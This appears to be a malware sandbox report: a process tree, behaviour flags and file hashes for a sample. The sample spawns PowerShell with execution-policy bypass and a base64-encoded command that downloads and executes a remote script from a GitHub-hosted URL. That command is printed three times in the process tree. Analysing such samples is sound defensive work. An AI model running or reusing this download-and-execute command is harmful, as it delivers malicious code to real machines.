C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:4084
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:4036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4184
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
a1d7faff5112d1dc81f5a04be27b477c
SHA154955d6fe2bf8f736546b6574f9c0e5eff28f21c
SHA256cfc76ffb75214acb069bc8aa69454c1a5b01157cee33886bc9cb159324dd8a91
SHA5126c0c2b187acb15f598f8cb0c1006ddbc965f020eee58258730e5cd5c80937c286eefe297d56506e195b239784a64d9cc241a1c082c71bd3a79f93818191d8c77
-
MD5
f6d8f41f54b59fb31bd0a40c2c6f4779
SHA102520d32ca27da68b2b45d3f78a6874e4202beb4
SHA256f015b1db7b548ebf9f7e7fa9c452b382039eb51d1e1e5726562208e7e72ef6b7
SHA5120b2ebb4c3c32c62cd36e54b8996d8a078f778776399c765cecce21e3c09003e92f9093d382f436789eb75f1927d07597cae0ac9c5a0df490cb82fc50cffe0ebe
-
MD5
9fca6b1768eba2c5d42f189123152e32
SHA1560ec3249af6e8d82e994554475b870d32145352
SHA256c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
3e05447e6c6a252a07b07d20e1b41aa8
SHA120a873edfb6549c4b38a7d8dde90442b74ef3810
SHA2562594fc915cfc399fe0cbdffc5237a3957c0ca0c13cb7552cf09bcbdfcc033f18
SHA51225ef5b816e3ad9347810365d70bbe169a4076814a876399990580ce487f362f4bd0c9a5a8055c2d7da77977cdb87fef9eed12cc4dc2813b310fd63c1be392aab
-
MD5
fcbafc207567a1012dc244098672e6fe
SHA17752fb795560b4b6b8c5a86623d2e46a21f0d72d
SHA25637c35e26f05b48083acea7ab07f8dfb85f63d08d7c059af52d70d65f9334247d
SHA5129b9b1f9641218936ec878f39ea0c490f98bf0f48469255b9bd369d4e7c441dafc73969bfcef23324749d416fd6b1b0851240e19072e6e68cb3bf89ddab90679a
-
MD5
0750828e5a80dae0280c43945332e145
SHA1fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14
-
MD5
0941efccfdbde6a619081456be071102
SHA14d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA25699dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab